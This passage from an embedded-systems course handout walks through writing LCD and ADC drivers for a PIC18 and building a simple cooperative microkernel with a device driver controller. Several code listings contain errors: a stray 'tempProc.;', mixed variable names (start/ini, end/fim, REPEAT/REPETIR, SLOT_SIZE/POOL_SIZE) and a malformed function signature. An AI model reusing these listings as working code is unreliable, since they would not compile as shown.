pushByte(value, 0);
delayMicroseconds(40);
}
void lcdChar(char value) {
pushByte((unsigned int) value, 1);
delayMicroseconds(2);
}
The initialization requires a strict protocol of delays and different operations.
#define PORTC
(*(volatile __near unsigned char*)0xF82)
#define PORTD
(*(volatile __near unsigned char*)0xF83)
#define TRISC
(*(volatile __near unsigned char*)0xF94)
#define TRISD
(*(volatile __near unsigned char*)0xF95)
void lcdInit() {
BitClr(TRISC, EN);
BitClr(TRISC, RS);
TRISD = 0x0f;
delayMicroseconds(50);
commandWriteNibble(0x03);
delayMicroseconds(5);
commandWriteNibble(0x03);
delayMicroseconds(100);
commandWriteNibble(0x03);
delayMicroseconds(5);
commandWriteNibble(0x02);
delayMicroseconds(10);
//configura o display
lcdCommand(0x28); //8bits, 2 linhas, 5x8
lcdCommand(0x06); //modo incremental
lcdCommand(0x0c); //display e cursor on, com blink
lcdCommand(0x03); //zera tudo
lcdCommand(0x80); //posição inicial
lcdCommand(0x01); //limpar display
delayMicroseconds(2);
}
To print a regular string one must just watch for the string end ‘\0’.
void lcdString(char msg[]) {
unsigned char i = 0; //fancy int. avoids compiler warning when comparing i
with strlen()'s uint8_t
while (msg[i]) {
lcdChar(msg[i]);
i++;
}
}
The LCD can build customized characters. The characters must be send to a specific address to the LCD
internal memory.
6
void lcdDefconLogo(void) {
int i;
unsigned char defcon[] = {
0x0, 0x1, 0x3, 0x3, 0x3, 0x3, 0x1, 0x4,
0xe, 0x1f, 0x4, 0x4, 0x1f, 0xe, 0x11, 0x1f,
0x0, 0x10, 0x18, 0x18, 0x18, 0x18, 0x10, 0x4,
0xc, 0x3, 0x0, 0x0, 0x0, 0x3, 0xc, 0x4,
0x0, 0x0, 0x1b, 0x4, 0x1b, 0x0, 0x0, 0x0,
0x6, 0x18, 0x0, 0x0, 0x0, 0x18, 0x6, 0x2
};
lcdCommand(0x40);
for (i = 0; i < 8 * 6; i++) {
lcdChar(defcon[i]);
}
}
2.4 Analog reading
The reading on the analog pins require an initial setup from the AD converter with a latter loop to wait for
conversion time.
#define TRISA
(*(volatile __near unsigned char*)0xF92)
#define ADCON2 (*(volatile __near unsigned char*)0xFC0)
#define ADCON1 (*(volatile __near unsigned char*)0xFC1)
#define ADCON0 (*(volatile __near unsigned char*)0xFC2)
#define ADRESL (*(volatile __near unsigned char*)0xFC3)
#define ADRESH (*(volatile __near unsigned char*)0xFC4)
void adInit(void) {
BitSet(TRISA, 0); //pin setup
ADCON0 = 0b00000001; //channel select
ADCON1 = 0b00001110; //ref = source
ADCON2 = 0b10101010; //t_conv = 12 TAD
}
unsigned int adRead(void) {
unsigned int ADvalue;
BitSet(ADCON0, 1); //start conversion
while (BitTst(ADCON0, 1)); //wait
ADvalue = ADRESH; //read result
ADvalue <<= 8;
ADvalue += ADRESL;
return ADvalue;
}
To use the AD it is needed only to initialize it before using. In the example below we're going to light the
led whenever the value goes above a threshold.
7
#define PORTD (*(volatile __near unsigned char*)0xF83)
#define TRISD (*(volatile __near unsigned char*)0xF95)
void main(void) {
TRISD = 0x00;
adInit();
for(;;){
//threshold on half the scale
if(adRead()>512){
PORTD = 0xFF;
}else{
PORTD = 0x00;
}
}
}
8
3 First embedded firmware
void main(void) {
OSCCON = 0x73;
lcdInit();
lcdDefconLogo();
lcdCommand(0x80);
lcdChar(0);
lcdChar(1);
lcdChar(2);
lcdString(" Defcon");
lcdCommand(0xC0);
lcdChar(3);
lcdChar(4);
lcdChar(5);
lcdString("mBed workshop");
adInit();
for (;;) {
lcdCommand(0x8B);
lcdChar((adRead() / 1000) % 10 + 48);
lcdChar((adRead() / 100) % 10 + 48);
lcdChar((adRead() / 10) % 10 + 48);
lcdChar((adRead() / 1) % 10 + 48);
}
}
9
4 What is a kernel?
In computer science the kernel is the software part of the system responsible to implement the interface
and manage the hardware and the application. The most critical hardware resources to be managed are the
processor, the memory and I/O drivers.
Another task that is commonly provided by the kernel is the process management. This is even more
important in embedded context, when, in general, the processes have strict time requirements.
When there is no kernel, all the responsibility of organizing the processes, hardware or application
processes, is over the programmer.
10
5 Kernel components
In general a kernel has three main responsibilities:
1) Manage and coordinate the processes
execution using “some criteria”
The “some criterea” can be the maximum execution time, the function's priorities, the event criticity, the
programmed execution sequence among others. It is this criteria which distinguishes the preemptive kernel
(which each process has a maximum time to be executed, if the time runs out the next process is started and
when it finishes, or its time expire, the first process is recalled from the exact point were it was interrupt) from
the cooperative (which each process will be executed until it ends and after it the next is called). As it is
responsible to manage the process, it should have functions that allow the inclusion of a new process or the
remove of an older one.
As each process uses, internally, some amount of memory for its variables, the kernel should handle it to.
It is the second kernel responsibility.
2) Manage the free memory and coordinate
the processes access to it
The kernel should also be capable to inform to the process when a malloc() function could not be
accomplished.
Aside the memory, the processes may also need to get access to the I/O resources from the
computer/microcontroler as serial ports, lcd displays, keyboards among others. The responsible to allow/deny
the access from the processes to the hardware devices is the kernel. This is the third kernel responsibility:
3) Intermediate the communication between the
hardware drivers and the processes
The kernel should provide an API which the processes can safely access the information available in the
hardware, both to read and to write.
11
6 Kernel Project
6.1 Why to develop our own kernel?
Having your own kernel can improve home design while still giving the developers full control over the
source.
With the single-loop architecture, you need to re-test almost everything every time you reuse code.
When the kernel is full tested, there is no problem in reuse. Even the applications have a better reuse rate as
the kernel keeps the hardware abstraction layer even if the chip is changed.
When planning to use a kernel in your new system development, always consider all alternatives, both
paid and free.
Even if the home design option was choosen start with a free project as basis. Both OpenRTOS and BRTOS
are really small (BRTOS has only 7 code files, and only one is hardware dependent) and their licenses are more
permissive (you can close the source code). Another great source information is the linux kernel
(www.kernel.org). There are as much as 10k lines added daily!
6.2 Alternatives
There are lots of options for moving from a kernel-less to a kernel design. Paid solutions have some
benefits, mainly for the technical support. Below are presented some options with their descriptions.
Windows Embedded Compact® is the Windows version for small computers and embedded systems. It is
a modular real-time operating system with a kernel that can run in under 1 MB of memory. It is available for
ARM, MIPS, SuperH and x86 processor architectures. The source code is available to modifications for the
developer.
VxWorks® is a real-time operating system. It has been ported and optmize to embedded systems,
including x86 family, MIPS, PowerPC, Freescale ColdFire, Intel i960, SPARC, SH-4 and ARM. In its smallest option
(fully static) have a footprint of just 36k.
X RTOS®: this kernel is mainly aimed in Deeply Embedded Systems with severe temporal restriction and
computer resources. It supports ARM and Power PC processors.
uClinux is a derivative of Linux kernel intended for microcontrollers without Memory Management Units
(MMUs). As an operating system it includes Linux kernel as well as a collection of user applications, libraries and
tool chains. The kernel can be compiled to a footprint of just 2k.
FreeRTOS kernel consists of only three or four C files (there are a few assembler functions included where
needed). SafeRTOS is based on the FreeRTOS code base but has been updated, documented, tested and audited
to enable its use in IEC 61508 safety related applications.
BRTOS is a lightweight preemptive real time operating system designed for low end microcontrollers. It
supports a preemptive scheduler, semaphores, mutexes, message queues and mailboxes. It is written mostly in
C language, with little assembly code. There are ports to Coldfire V1, HCS08, RX600, MSP430, ATMEGA328/128
and Microchip PIC18. It can be compiled to just 2KB of program memory and about 100bytes of RAM.
6.3 Monolithic kernel versus microkernel
The main difference between these architectures are the amount of functions that are implemented
inside the kernel space. By keeping a minimalistic approach, microkernels tend to use less resources from the
cpu. Becouse the device drivers are now in the user space, microkernels tend to be less susceptible from drivers
crash. It is also easier to maintain an microkernel because its small source code size, generally under 10.000
12
lines. As Jochen Liedtke stated:
“A concept is tolerated inside the microkernel only if moving it outside the kernel, i.e., permitting
competing implementations, would prevent the implementation of the system's required functionality.”
6.4 Kernel design decisions:
The designer should consider some points before star the development of the kernel:
I/O devices management: How should the kernel implement the device interface? Inside the kernel?
Using devices drivers? Will it use a separated driver controller or it will be implicit in kernel activities? The direct
access (application<>driver) will be possible? In which case? In case of hot-plug devices how the kernel will load
the drive dynamically?
Process management: The kernel context switch will be cooperative or preemptive? How the process can
communicate with each other? Will a message queue be implemented? Should it have an shared memory?
How to control its access? Will semaphores be available? Is there any need to implement process priority
check?
System safety: Is there any hardware safety item to be used (watchdog, protected memory)? Will
hierarchical protection be used? If so, does the CPU support MMU or the design can go on with the slowdown
of software protection checking? The system should try to close and restart an unanswered process
automatically?
Decide carefully, some of these decisions cannot be changed without a complete source code rewrite,
other ones can be delayed until latter in the project. Bring the hardware responsible to help in this definition,
some of the decisions are very hardware dependent.
6.5 This course decisions
In this course we will present a simple non-preemptive, cooperative microkernel, without memory
management using an device driver controller to isolate the devices drivers from the kernel. The processes will
be scheduled based on their execution frequency necessities.
13
7 Concepts
Kernel development require some deep knowledge in programming and hardware/software issues. Some
of these points will be presented ahead.
7.1 Function pointers
In some situation we want our program to choose which function to execute, for example an image
editor: use the function blur or the function sharpen at some image. Declaring both function:
image Blur(image nImg){
// Function implementation
}
image Sharpen(image nImg){
// Function implementation
}
We can build the image editor engine as:
image imageEditorEngine(image nImg, int option){
image temp;
switch(option){
case 1:
temp = Sharpen(nImg);
break;
case 2:
temp = Blur(nImg);
break;
}
return temp;
}
Its clear that we need to change the engine code if we need to add some more features. In general,
changing the code means more tests and more bugs.
Another option is to made the engine a little bit more generic by using function pointers.
//declaracao do tipo ponteiro para função
typedef image (*ptrFunc)(image nImg);
//chamado pelo editor de imagens
image imageEditorEngine(ptrFunc function, image nImg){
image temp;
temp = (*function)(nImg);
return temp;
}
From the code we could note that the function receives now an pointer to function as parameter. This
way we do not need to worry about adding features, the main code will be kept intact. One of the drawbacks is
that all functions now must have the same signature, it means, they must receive the same type parameters in
the same order and the return variable must be of the same type.
Using function pointers concept we can than use the Blur and Sharpen functions in an easier way:
//...
image nImage = getCameraImage();
nImage = imageEditorEngine(Blur, nImagem);
nImage = imageEditorEngine(Sharpen, nImagem);
//...
The
functions
are
passed
as
if
they
were
variables.
14
By essentially being an pointer, we must dereference the variable before using the function:
temp = (*function)(nImg);
We can also store the function passed as parameter as a conventional variable. This way we can call that
function latter in the program (only the pointer is stored, no code is actually copied).
The syntax function pointer declaration is somehow complex. Normally we use a typedef to make things
clear.
7.2 First example
In this first example we will build the main part of our kernel. It should have a way to store which
functions are needed to be executed and in which order. To accomplish this we will use an vector of function
pointers:
//pointer function declaration
typedef void(*ptrFunc)(void);
//process pool
static ptrFunc pool[4];
Our processes will be of ptrFunc type, i.e. they do not receive any parameters and do not return anything.
Each process will be represented by a function. Here are three examples
static void tst1(void) { printf("Process 1\n");}
static void tst2(void) { printf("Process 2\n");}
static void tst3(void) { printf("Process 3\n");}
These processes just print their name on the console/default output.
The kernel itself has three functions, one to initialize itself, one to add new process to the process pool,
and one to start the execution. As it is supposed that the kernel never wears off, we build an infinite loop inside
its execution function.
//kernel variables
static ptrFunc pool[4];
static int end;
//protótipos das funções do kernel
static void kernelInit(void);
static void kernelAddProc(ptrFunc newFunc);
static void kernelLoop(void);
//funções do kernel
static void kernelInit(void){
end = 0;
}
static void kernelAddProc(ptrFunc newFunc){
if (end <4){
pool[end] = newFunc;
end++;
}
}
static void kernelLoop(void){
int i;
for(i=0; i<end;i++){
(*pool[i])();
}
}
In this first example the kernel only execute the functions that are given to it, in the order which they
were called. There is no other control. The process pool size is defined statically.
To use the kernel we should follow three steps: initialize the kernel, add the desired processes, and
15
execute the kernel.
void main(void){
kernelInit();
kernelAddProc(tst1);
kernelAddProc(tst2);
kernelAddProc(tst3);
kernelLoop();
}
7.3 Structs
Structs are composed variables. With them we can group lots of information and work with them as if
they were one single variable. They can be compared with vectors, but each position can store a different type
variable. Here is an example:
typedef struct{
unsigned short int age;
char name[51];
float weight;
}people; // struct declaration
void main(void){
struct people myself = {26, "Rodrigo", 70.5};
//using each variable from the struct
printf("Age: %d\n", myself.age);
printf("Name: %s\n", myself.name);
printf("Weight: %f\n", myself.weight);
return 0;
}
To build a functional kernel, we need to aggregate more information about each process. We will make it
through a struct. For now just the function pointer is enough. As more information is needed (as process ID or
priority) we will add to the process struct.
//function pointer declaration
typedef char(*ptrFunc)(void);
//process struct
typedef struct {
ptrFunc function;
} process;
We should note that now every process must return a char. We will use it as returning condition indicating
success or failure.
7.4 Circular buffers
Buffers are memory spaces with the propose of storing temporary data. Circular buffers can be
implemented using a normal vector with two indexes, one indicating the list start and other indicating the list
end.
The main problem with this implementation is to define when the vector is full or empty, as in both cases
the start and the end index are pointing to the same place.
There are at least 4 alternatives on how to resolve this problem. In order to keep the system simplicity we
will keep the last slot always open, in this case if (start==end) the list is empty.
16
Below there is an example on how to cycle through all the vector an infinite number of times:
#define CB_SIZE 10
int circular_buffer[CB_SIZE];
int index=0;
for(;;){
//do anything with the buffer
circular_buffer[index] = index;
//increment the index
index = (index+1)%CB_SIZE;
}
To add one element to the buffer (avoiding overflow) we can implement a function like this:
#define CB_SIZE 10
int circular_buffer[CB_SIZE];
int start=0;
int end =0;
char AddBuff(int newData){
//check if there is space to add any number
if ( ((end+1)%CB_SIZE) != start){
circular_buffer[end] = newData;
end = (end+1)%CB_SIZE;
return SUCCESS;
}
return FAIL;
}
7.5 Second Example
As presented there is four important changes in this version: the process pool now is implemented as a
circular buffer,the process is now represented as a struct, composed of the process id and the process function
pointer and all functions return an error/success code.
The last change is that now the process can inform the kernel that it wants to be rescheduled. The kernel
then re-adds the process to the process pool
//return code
#define SUCCESS 0
#define FAIL 1
#define REPEAT 2
//kernel information
#define POOL_SIZE 4
process pool[SLOT_SIZE];
char start;
char end;
//kernel functions
char kernelInit(void);
char kernelAddProc(process newProc);
void KernelLoop(void);
The biggest change in kernel usage is that now we need to pass an process struct to AddProc function
instead of only the function pointer. Note that each process function returns if they are successfully finished or
if it wants to be rescheduled.
17
char tst1(void){
printf("Process 1\n");
return REPEAT;
}
char tst2(void){
printf("Process 2\n");
return SUCCESS;
}
char tst3(void){
printf("Process 3\n");
return REPEAT;
}
void main(void){
//declaring the processes
process p1 = {tst1};
process p2 = {tst2};
process p3 = {tst3};
kernelInit();
//now is possible to test if the process was added successfully
if (kernelAddProc(p1) == SUCCESS){
printf("1st process added\n");
}
if (kernelAddProc(p2) == SUCCESS){
printf("2nd process added\n");
}
if (kernelAddProc(p3) == SUCCESS){
printf("3rd process added\n");
}
kernelLoop();
}
The kernel function Execute are the one with most changes. Now it needs to check if the executed
function wants to be rescheduled and act as specified.
18
void kernelLoop(void){
int i=0;
for(;;){
//Do we have any process to execute?
if (start != end){
printf("Ite. %d, Slot. %d: ", i, start);
//execute the first function and
//check if there is need to reschedule
if ( (*(pool[start].Func))() == REPEAT){
//rescheduling
kernelAddProc(pool[start]);
}
//prepare to get the next process
start = (start+1)%POOL_SIZE;
//just for debug
i++;
}
}
}
The AddProc() function have to check if there is at least two slots available in the buffer (remember that
the last position is required to be free all times) and insert the process.
char kernelAddProc(process newProc){
//checking for free space
if ( ((end+1)%SLOT_SIZE) != start){
pool[end] = newProc;
end = (end+1)%POOL_SIZE;
return SUCCESS;
}
return FAIL;
}
The initialization routine only set start and end variables to the first position
char kernelInit(void){
start = 0;
end = 0;
return SUCCESS;
}
Here is presented the output of the main program for the first 10 iterations.
-----------------------------
1st process added
2nd process added
3rd process added
Ite. 0, Slot. 0: Process 1
Ite. 1, Slot. 1: Process 2
Ite. 2, Slot. 2: Process 3
Ite. 3, Slot. 3: Process 1
Ite. 4, Slot. 0: Process 3
Ite. 5, Slot. 1: Process 1
Ite. 6, Slot. 2: Process 3
Ite. 7, Slot. 3: Process 1
Ite. 8, Slot. 0: Process 3
Ite. 9, Slot. 1: Process 1
...
-----------------------------
Note that only process 1 and 3 are repeating, as expected. Note also that the pool is cycling through slots
19
0, 1, 2 and 3 naturally. For the user the process pool seems “infinite” as long as there is no more functions than
slots.
7.6 Temporal conditions
In the majority part of embedded systems, we need to guarantee that a function will be executed in a
certain frequency. Some systems may even fail if these deadlines are not met.
There are at least 3 conditions that need to be satisfied in order to implement temporal conditions on the
kernel:
1. There must be a tick event that occurs with a precise frequency
2. The kernel must be informed of the execution frequency needed for each process.
3. The sum of process duration must “fit” within the processor available time.
The first condition can be easily satisfied if there is an available internal timer that can generate an
interrupt. This is true for the overwhelming majority of microcontrollers. There is no need for a dedicate
interrupt routine.
For the second condition we just need to add the desired information in the process struct. We added two
integers, the first indicate the period which the frequency should be recalled (if it returns REPEAT code). The
second is an internal variable, in which the kernel store the remaining time before call function.
//process struct
typedef struct {
ptrFunc function;
int period;
int start;
} process;
The third condition depends entirely on the system itself. Suppose a system which the function
UpdateDisplays() need to be called in 5ms interval. If this function execution time is greater than 5ms it is
impossible to guarantee its execution interval. Another point worth consideration is about the type of context
switcher, if it is preemptive or cooperative. On a cooperative system, the process must finish its execution
before another one can run on CPU. On a preemptive system, the kernel can stop one process execution
anywhere to execute another process. If a system does not “fit” on the available time, there are three options:
switch to a faster processor, optimize the execution time of the processes or to redesign the processes
frequency needs.
When implementing the time conditions a problem may arrise. Suppose two process P1 and P2. The first
is scheduled to happen 10 seconds from now and the second at 50 seconds from now. The timer we are using is
16 bits unsigned (values from 0 to 65.535) counting in miliseconds and now it is marking 45,5 seconds
(now_ms =45.535).
We can see from the picture that the process P2 was correctly scheduled as P2.start = now_ms + 50.000 =
30.000; The now_ms variable will be incremented until 55.535 when the process P1 will started (with the
20
correct delay of 10 seconds). The variable now_ms will continue until 65.535 and then return to zero.
When the overflow happen, exactly 20 seconds has passed from the start (65.535 - 45.535 = 20.000ms).
P2 required 50 seconds of delay. Its necessary to wait for more 30 seconds before it can be called, which is
exactly what will happen when now_ms get to 30.000.
The problem to use an finite number to measure time may arise when two processes should be called
withing a small space of time or even simultaneous.
Suppose that now P1 and P2 are scheduled to happen exactly at now_ms = 30.000. If P1 is called first and
takes 10 seconds to be executed we will have the following time-line:
The question now is: From the time-line above (that is the only information that the kernel has), the
process P2 should have already been executed and wasn't or it was scheduled to happen 50.535 ms from now?
In order to solve this problem there are two options:
1. Create a flag for each process indicating when it has already being passed by the timer counter. This
way we can know if a process behind the counter is late or if it has been scheduled to happen ahead.
2. Create a counter that will be decrement at each kernel clock. It will be executed when it arrives at zero.
The second option introduces more overhead as we need to decrement all processes counters. On the
other hand if we allow the counter to assume negative numbers (as it is decremented) we can see for how
many time the process is waiting. With this information we can do something to avoid starvation. One option is
to create a priority system and promote the process if it stays too much time without being executed.
7.7 Third Example
This time we're adding the time component to the kernel. Each process has a field called start which is
decremented as time pass by. When it became zero (or negative) we call the function.
The ExecuteKernel() function will be responsible to find the process that is closer to be executed based on
its start counter. It is necessary to go through the whole pool to make this search. When the next process to be
executed is found we swap its position with the first one on the pool. After it we just spend time waiting for the
process be ready to execute.
This apparent useless time is needed to synchronize all the events and is a good opportunity to put the
system on the low power mode.
21
void ExecutaKernel(void){
unsigned char j;
unsigned char next;
process tempProc;
for(;;){
if (start != end){
//Findind the process with the smallest start
j = (start+1)%SLOT_SIZE;
next = start;
while(j!=end){
//does the next has a smaller time?
if (pool[j].start < pool[next].start){
next = j;
}
//get the next one in the circular buffer
j = (j+1)%SLOT_SIZE;
}
//exchanging positions in the pool
tempProc = pool[next];
pool[next] = pool[start];
pool[start] = tempProc.;
while(pool[start].start>0){
//great place to use low power mode
}
//checking if need to be repeated
if ( (*(pool[ini].function))() == REPEAT ){
AddProc(&(vetProc[ini]));
}
//next process
ini = (ini+1)%SLOT_SIZE;
}
}
}
Now the interrupt routine. It must decrement the start field of all of the processes.
void interrupt_service_routine(void) interrupt 1{
unsigned char i;
i = ini;
while(i!=fim){
if((pool[i].start)>(MIN_INT)){
pool[i].start--;
}
i = (i+1)%SLOT_SIZE;
}
}
The AddProc() function will be the responsible to initialize the process with an adequate value on the
struct fields.
22
char AddProc(process newProc){
//checking for free space
if ( ((end+1)%SLOT_SIZE) != start){
pool[end] = newProc;
//increment start timer with period
pool[end].start += newProc.period;
end = (end+1)%SLOT_SIZE;
return SUCCESS;
}
return FAIL;
}
Instead of resetting the start counter we add the period to it. This was done because when the function
starts, its counter keeps decrementing. If a function needs to be executed at a 5ms interval and it spends 1ms
executing, when it finishes we want to reschedule it to execute 4ms ahead (5ms of period + -1ms negative start
counter) and not 5ms ahead.
Void pointers
When designing the device driver controller we should build an “call distribution center”. This center will
receive an order from the application, via kernel, and redirect it to right device driver. The problem arises when
we think on how many parameters the function should receive: one representing which driver is required,
another one indicates which function of that driver should be called and an unknown amount of parameters
that need to be passed to the driver. How to build such function?
It can be done with a pointer to void.
char * name = “Paulo”;
double weight = 87.5;
unsigned int children = 3;
void print(int option; void *parameter){
switch(option){
case 0:
printf("%s",*((char*)parameter));
break;
case 1:
printf("%f",*((double*)parameter));
break;
case 2:
printf("%d",*((unsigned int*)parameter));
break;
}
}
void main (void){
print(0, &name);
print(1, &weight);
print(2, &children);
}
From the above example we can see how to receive different types using the same function.
23
8 The Kernel
This is the full kernel presented in the earlier steps. In order to make it run on the development board we
are counting on auxiliary libraries: one to work with interrupts (int.c and int.h), one to operate the timer
(timer.c and timer.h), one to configure the microcontroler fuses (config.h) and another one with the special
registers information (basico.h).
//CONFIG.H
//microcontroler fuses configuration
code char at 0x300000 CONFIG1L = 0x01; // No prescaler used
code char at 0x300001 CONFIG1H = 0x0C; // HS: High Speed Cristal
code char at 0x300003 CONFIG2H = 0x00; // Disabled-Controlled by SWDTEN bit
code char at 0x300006 CONFIG4L = 0x00; // Disabled low voltage programming
//INT.H
void InicializaInterrupt(void);
//TIMER.H
char FimTimer(void);
void AguardaTimer(void);
void ResetaTimer(unsigned int tempo);
void InicializaTimer(void);
//BASICO.H (only part of it)
#define SUCCESS 0
#define FAIL 1
#define REPEAT 2
//bit functions
#define BitFlp(arg,bit) ((arg) ^= (1<<bit))
//special register information
#define PORTD (*(volatile __near unsigned char*)0xF83)
#define TRISC (*(volatile __near unsigned char*)0xF94)
In order to work with time requirements we need to make some operations in fixed intervals of time,
mainly decrement the process start counter. These steps were grouped together in one function: KernelClock().
The user just need to call this function from its own timer interrupt function.
void kernelClock(void){
unsigned char i;
i = ini;
while(i!=fim){
if((pool[i].start)>(MIN_INT)){
pool[i].start--;
}
i = (i+1)%SLOT_SIZE;
}
}
The other kernel function stays the same as presented.
24
char kernelAddProc(process newProc){
//checking for free space
if ( ((end+1)%SLOT_SIZE) != start){
pool[end] = newProc;
//increment start timer with period
pool[end].start += newProc.period;
end = (end+1)%SLOT_SIZE;
return SUCCESS;
}
return FAIL;
}
char kernelInit(void){
start = 0;
end = 0;
return SUCCESS;
}
void kernelLoop(void){
unsigned char j;
unsigned char next;
process tempProc;
for(;;){
if (start != end){
//Findind the process with the smallest start
j = (start+1)%SLOT_SIZE;
next = start;
while(j!=end){
//does the next has a smaller time?
if (pool[j].start < pool[next].start){
next = j;
}
//get the next one in the circular buffer
j = (j+1)%SLOT_SIZE;
}
//exchanging positions in the pool
tempProc = pool[next];
pool[next] = pool[start];
pool[start] = tempProc.;
while(pool[start].start>0){
//great place to use low power mode
}
//checking if need to be repeated
if ( (*(pool[ini].function))() == REPEAT ){
AddProc(&(vetProc[ini]));
}
//next process
ini = (ini+1)%SLOT_SIZE;
}
}
}
To declare the interrupt function for SDCC compiler we just need to add ”interrupt 1” at the end of the
function name. As mentioned it just reset the timer and calls the KernelClock.
25
//Interrupt
void isr1(void) interrupt 1{
ResetaTimer(1000); //reset with 1ms
KernelClock();
}
In order to use the kernel we just need to call its initialization function, add the processes with their
frequency of execution and call the ExecutaKernel() function.
//Blink led 1
char tst1(void) {
BitFlp(PORTD,0);
return REPETIR;
}
//Blink led 2
char tst2(void) {
BitFlp(PORTD,1);
return REPETIR;
}
//Blink led 3
char tst3(void) {
BitFlp(PORTD,2);
return REPETIR;
}
void main(void){
//declaring the processes
process p1 = {tst1,0,100};
process p2 = {tst2,0,1000};
process p3 = {tst3,0,10000};
kernelInit();
kernelAddProc(p1);
kernelAddProc(p2);
kernelAddProc(p3);
kernelLoop();
}
26
9 Building the device driver controller
In order to isolate the drivers from the kernel (consequently from the applications) we will build an device
driver controller. It will be responsible to load the driver and pass the orders received from the kernel to the
right driver.
9.1 Device Driver Pattern
All kernels presents some kind of pattern to build your driver driver. This standardization is fundamental
to the system. Only by having an standard interface, the kernel could communicate with a driver that he knows
nothing at compile time.
In order to simplify the pointers usage, we've build several typedefs. ptrFuncDriver is a pointer to a
function that returns a char (error/success code) and receives a pointer to void as parameter. It is used to call
each driver's function as all of them must have this signature.
typedef char(*ptrFuncDrv)(void *parameters);
The driver struct is composed of the driver id, an array of ptrFuncDrv pointers (represented as a pointer)
and a special function also of the type ptrFuncDrv. This last function is responsible to initialize the driver once it
is loaded.
typedef struct {
char drv_id;
ptrFuncDrv *functions;
ptrFuncDrv drv_init;
} driver;
In order to the device driver controller to access the device drivers, it need to get a pointer to a “driver
structure”. Instead of make a statical linking, we set the links with a pointer to a function that, when called,
returns the desired device driver.
typedef driver* (*ptrGetDrv)(void);
A generic driver needs then to implement at least 2 functions: init() and getDriver(). It also needs to have
a driver struct and a array of pointers, each position pointing to each function it implements. It also needed to
build an enumerator defining the positions of each function pointer in the array.
9.2 Controller engine
The device driver controller will need at least to known all available drivers. It is done by a vector of
ptrGetDriver, in which each position holds the pointer to the driver function that return its driver struct. The
position which the pointers are stored in the vector is defined by an enumerator, helping identify which pointer
is for which driver.
drvGeneric
-thisDriver: driver
-this_functions: ptrFuncDrv[ ]
+availableFunctions: enum = {GEN_FUNC_1, GEN_FUNC_2 }
-init(parameters:void*): char
+getDriver(): driver*
-genericDrvFunc1(parameters:void*): char
-genericDrvFunc2(parameters:void*): char
27
//it is needed to include all drivers file
#include "drvInterrupt.h"
#include "drvTimer.h"
#include "drvLcd.h"
//this enumerator helps the developer to access the drivers
enum {
DRV_INTERRUPT,
DRV_TIMER,
DRV_LCD,
DRV_END /*DRV_END should always be the last*/
};
//the functions to get the drivers should
//be put in the same order as in the enum
static ptrGetDrv drvInitVect[DRV_END] = {
getInterruptDriver,
getTimerDriver,
getLCDDriver
};
The device driver controller has one array of drivers and a counter indicating how many drivers are loaded
at the moment. There are only 3 functions: one to initialize the internal variables, one to load a driver and one
to that parse the commands from the kernel to the correct driver.
Loading a driver is pretty straightforward. If the driver DRV_INTERRUPT needs to be loaded, we go to the
available drivers list and ask for the interrupt driver. Then we call its initialization routine and store it on the
loaded list. If there is no space for another driver the function returns an error
char initDriver(char newDriver) {
char resp = FIM_FALHA;
if(driversLoaded < QNTD_DRV) {
drivers[driversLoaded] = drvInitVect[newDriver]();
resp = drivers[driversLoaded]->drv_init(&newDriver);
driversLoaded++;
}
return resp;
}
The call driver routine go through the loaded drivers list to identify the correct driver. When there is a
match the correct function is called and the parameters passed as a pointer to void (in this moment we do not
know what are the parameters).
char callDriver(char drv_id, char func_id, void *parameters) {
char i, j;
for (i = 0; i < driversLoaded; i++) {
if (drv_id == drivers[i]->drv_id) {
return drivers[i]->func_ptr[func_id].func_ptr(parameters);
}
}
return DRV_FUNC_NOT_FOUND;
}
9.3 Using the controller engine
In order to use the controller engine we just need to include its header on the main file and make use of
the enumerators defined in each driver file to access the hardware.
28
void main(void) {
//system initialization
//the kernel also start the controller init function.
InicializaKernel();
initDriver(DRV_LCD);
callDriver(DRV_LCD, LCD_CARACTER, 'U');
callDriver(DRV_LCD, LCD_CARACTER, 'n');
callDriver(DRV_LCD, LCD_CARACTER, 'i');
callDriver(DRV_LCD, LCD_CARACTER, 'f');
callDriver(DRV_LCD, LCD_CARACTER, 'e');
callDriver(DRV_LCD, LCD_CARACTER, 'i');
}
The function LCD_CARACTER in the driver DRV_LCD send a character (ASCII coded) to the LCD attached to
the microcontroller. If there is any need to modify the LCD or change the port which it is connected, the
application will be kept intact, the developer needs only to change the driver.
9.4 Interesting situations
There are some interesting solutions that helps the application to keep its high level while still interacting
with the hardware. One of theses situation is to hide the interrupt routine inside a driver while still allowing to
the application developer to define its behavior.
//defining the type of pointer to use as an interrupt
typedef void (*intFunc)(void);
//store the pointer to interrupt service routine here
static intFunc thisInterrupt;
char setInterruptFunc(void *parameters) {
thisInterrupt = (intFunc) parameters;
return FIM_OK;
}
The interrupt driver will store a pointer inside itself. This pointer can be change via setInterrupFunc()
function. The actual interrupt function will be passed as a parameter.
Also inside the file is the compiler verbosity that indicates which function is responsible to call the
interrupt:
//SDCC compiler way
void isr(void) interrupt 1{
thisInterrupt();
}
//C18 compiler way
void isr (void){
thisInterrupt();
}
#pragma code highvector=0x08
void highvector(void){
_asm goto isr _endasm
}
#pragma code
By using the pointer to store the ISR, the low end details of the compiler were hidden from the
application.
29
9.5 Driver callback
In some I/O processes, we ask for something and than we need to wait for the answer, generally by
pooling the end bit. With the device driver controller, we can call the driver asking for it to start its work and
pass a function that will be called back when it has finished its job. This way we save CPU processing time while
still getting the result as fast as possible.
In order to accomplish this, the driver must be able to rise an interruption in the system.
First the application request the data from driver and pass the callback function. The driver store the
callback for latter use, start the process and setup the interrupt routine. All this are made in normal/application
mode.
//Process called by the kernel
char adc_func(void) {
static process proc_adc_callback = {adc_callback, 0, 0};
callDriver(DRV_ADC,ADC_START,&proc_adc_callback);
return REPEAT;
}
//function called by the process adc_func (via driver controler)
char startConversion(void* parameters){
callBack = parameters;
ADCON0 |= 0b00000010;
//inicia conversao
callDriver(DRV_INTERRUPT,INT_ADC_SET,(void*)adcISR);
return SUCCESS;
}
When the desired interruption happens, the interrupt that was set is called. The driver do all the required
procedures (copy data, raise flags, etc). Before finish, the driver create an new process in the kernel. Note that
all whis work is made in Interrupt mode. These function should be fast in order to avoid starvation on the
normal/application mode.
30
//interrupt function
void isr(void) interrupt 1 {
if (BitTst(INTCON, 2)) {//Timer overflow
timerInterrupt();
}
if (BitTst(PIR1, 6)) {//ADC conversion finished
//calling ISR stored in the adcInterrupt function pointer
adcInterrupt();
}
}
//function on the ADC driver called by the ISR
void adcISR(void){
value = ADRESH;
value <<= 8;
value += ADRESL;
BitClr(PIR1,6);
kernelAddProc(callBack);
}
When the callback became the next on the process pool, the kernel will grant its share on processor time.
